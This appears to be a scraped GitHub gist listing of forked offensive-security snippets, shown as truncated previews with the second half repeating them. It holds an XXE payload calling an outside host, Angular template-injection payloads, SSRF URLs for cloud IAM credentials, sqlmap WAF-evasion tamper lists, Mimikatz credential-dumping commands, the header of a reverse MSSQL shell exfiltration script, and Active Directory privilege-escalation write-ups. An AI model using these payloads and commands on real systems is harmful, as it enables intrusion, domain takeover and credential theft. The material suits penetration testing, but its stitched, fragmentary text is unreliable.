srand2

## burp.txt
[  0.001s] [diagnostic]
********************************************************
[TEST 1/7: webchannel.googleapis.com with default options] STARTING at 2021-08-18T11:32:40.125Z]
********************************************************
[  0.012s] [diagnostic] >>> [TEST 1/7: webchannel.googleapis.com with default options] createWebChannel("https://webchannel.googleapis.com/staging/channel/generator", {"backgroundChannelTest":true,"httpSessionIdParam":"gsessionid","initMessageHeaders":{},"sendRawJson":true,"supportsCrossDomainXhr":true,"internalChannelParams":{"forwardChannelRequestTimeoutMs":600000},"httpHeadersOverwriteParam":"$httpHeaders","disableRedact":true})
[  0.016s] [diagnostic] >>> [TEST 1/7: webchannel.googleapis.com with default options] open()
[  0.017s] [goog.labs.net.webChannel.WebChannelDebug] connect()
[  0.017s] [goog.labs.net.webChannel.WebChannelDebug] Origin Trials enabled.
[  0.018s] [goog.labs.net.webChannel.WebChannelDebug] connectChannel_()
[  0.019s] [goog.labs.net.webChannel.WebChanne

## certifried_with_krbrelayup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                srand2
                / certifried_with_krbrelayup.md
            
            
              Created
              May 17, 2022 07:38
                — forked from tothi/certifried_with_krbrelayup.md
            
              
                Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
              
          
    Certifried combined with KrbRelayUp


Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts
or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user
on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged
domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:

  
## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## Workstation-Takeover.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                srand2
                / Workstation-Takeover.md
            
            
              Created
              August 10, 2022 13:44
                — forked from gladiatx0r/Workstation-Takeover.md
            
              
                From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
              
          
    Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

  
## AngularTI.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              0 stars
            
          
                srand2
                / AngularTI.md
            
            
              Created
              September 6, 2022 13:04
                — forked from mccabe615/AngularTI.md
            
              
                Angular Template Injection Payloads
              
          
    1.3.2 and below

{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';


## mandros3.py
import sys
import requests
import threading
import base64
from html.parser import HTMLParser
from http.server import BaseHTTPRequestHandler, HTTPServer

'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz

## cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

## sqlmap tamper scripts
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```

## Mimikatz-cheatsheet

#general
privilege::debug
log
log customlogfilename.log


#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full

## clean_dns_records.py
#!/usr/bin/env python3

import sys
import string
import random
import dns.resolver
import threading
import tldextract
import concurrent.futures
	[ 0.001s] [diagnostic]
	********************************************************
	[TEST 1/7: webchannel.googleapis.com with default options] STARTING at 2021-08-18T11:32:40.125Z]
	********************************************************
	[ 0.012s] [diagnostic] >>> [TEST 1/7: webchannel.googleapis.com with default options] createWebChannel("https://webchannel.googleapis.com/staging/channel/generator", {"backgroundChannelTest":true,"httpSessionIdParam":"gsessionid","initMessageHeaders":{},"sendRawJson":true,"supportsCrossDomainXhr":true,"internalChannelParams":{"forwardChannelRequestTimeoutMs":600000},"httpHeadersOverwriteParam":"$httpHeaders","disableRedact":true})
	[ 0.016s] [diagnostic] >>> [TEST 1/7: webchannel.googleapis.com with default options] open()
	[ 0.017s] [goog.labs.net.webChannel.WebChannelDebug] connect()
	[ 0.017s] [goog.labs.net.webChannel.WebChannelDebug] Origin Trials enabled.
	[ 0.018s] [goog.labs.net.webChannel.WebChannelDebug] connectChannel_()
	[ 0.019s] [goog.labs.net.webChannel.WebChanne
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	import sys
	import requests
	import threading
	import base64
	from html.parser import HTMLParser
	from http.server import BaseHTTPRequestHandler, HTTPServer

	'''
	Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
	Author: @xassiz
	## IPv6 Tests
	http://[::ffff:169.254.169.254]
	http://[0:0:0:0:0:ffff:169.254.169.254]

	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# Microsoft access
	```

	#general
	privilege::debug
	log
	log customlogfilename.log


	#sekurlsa
	sekurlsa::logonpasswords
	sekurlsa::logonPasswords full
	#!/usr/bin/env python3

	import sys
	import string
	import random
	import dns.resolver
	import threading
	import tldextract
	import concurrent.futures